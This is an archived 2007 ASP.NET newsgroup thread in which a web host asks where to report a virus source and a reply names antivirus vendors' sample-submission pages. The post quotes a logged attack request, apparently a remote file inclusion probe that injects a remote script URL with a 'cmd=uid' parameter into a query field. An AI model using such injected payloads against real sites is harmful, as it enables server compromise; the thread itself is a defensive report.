|
|
|
start date: Tue, 14 Aug 2007 08:13:22 -0700,
posted on: microsoft.public.dotnet.framework.aspnet
back
| Thread Index |
|
1
Smithers
|
|
2
Teemu Keiski
|
OT: Where to Report Source of Virus?
My question: is there some sort of authority I can report this to? If so,
who? I have a URL directly to a virus-infected file that's getting spread
around on the Internet.
My situation is this: I have a Web server (hosted at a commercial data
center) that faces the public Internet. One of my customer's Web sites has
recently been the subject of some sort of attack - I'm not sure how to
categorize it. The attacker (apparently a spider named lwp-trivial)
substitutes a URL to an otherwise valid query string, then submits the
request. The following is from my centralized error logging routine that
logs all exceptions not otherwise handled:
<RawURL>/udp/UDP_01.aspx?memberID=http://www.DOMAINNAME/smarty/templates/manager/.xpl/FILENAME.jpg?&cmd=uid</RawURL>
<UserAgent>lwp-trivial/1.40</UserAgent>
NOTE: Everything in the RawURL is legitimate up to and including "memberID="
After that, it's whatever the bot substituted in place of legit values.
I have changed the real domain name and file name in the above request for
purposes of posting here.
I entered the above bot-injected URL directly into my browser and
immediately Norton AV detected a virus.
Thanks.
Date:Tue, 14 Aug 2007 08:13:22 -0700
Author:
|
Re: Where to Report Source of Virus?
Virus Scanner tool providers such as F-Secure or Symantec are such
authorities. For example:
http://www.f-secure.com/security_center/sample_submit.html
However, If their products already detect the virus, I think there's no need
to inform them. There are also secuity etc related email lists etc where you
can spread information.
--
Teemu Keiski
AspInsider, ASP.NET MVP
http://blogs.aspadvice.com/joteke
http://teemukeiski.net
"Smithers" wrote in message
news:OHlHnWo3HHA.4476@TK2MSFTNGP06.phx.gbl...
> My question: is there some sort of authority I can report this to? If so,
> who? I have a URL directly to a virus-infected file that's getting spread
> around on the Internet.
>
> My situation is this: I have a Web server (hosted at a commercial data
> center) that faces the public Internet. One of my customer's Web sites has
> recently been the subject of some sort of attack - I'm not sure how to
> categorize it. The attacker (apparently a spider named lwp-trivial)
> substitutes a URL to an otherwise valid query string, then submits the
> request. The following is from my centralized error logging routine that
> logs all exceptions not otherwise handled:
>
> <RawURL>/udp/UDP_01.aspx?memberID=http://www.DOMAINNAME/smarty/templates/manager/.xpl/FILENAME.jpg?&cmd=uid</RawURL>
> <UserAgent>lwp-trivial/1.40</UserAgent>
>
> NOTE: Everything in the RawURL is legitimate up to and including
> "memberID=" After that, it's whatever the bot substituted in place of
> legit values.
>
> I have changed the real domain name and file name in the above request for
> purposes of posting here.
>
> I entered the above bot-injected URL directly into my browser and
> immediately Norton AV detected a virus.
>
> Thanks.
>
Date:Tue, 14 Aug 2007 20:47:03 +0300
Author:
|
|
|
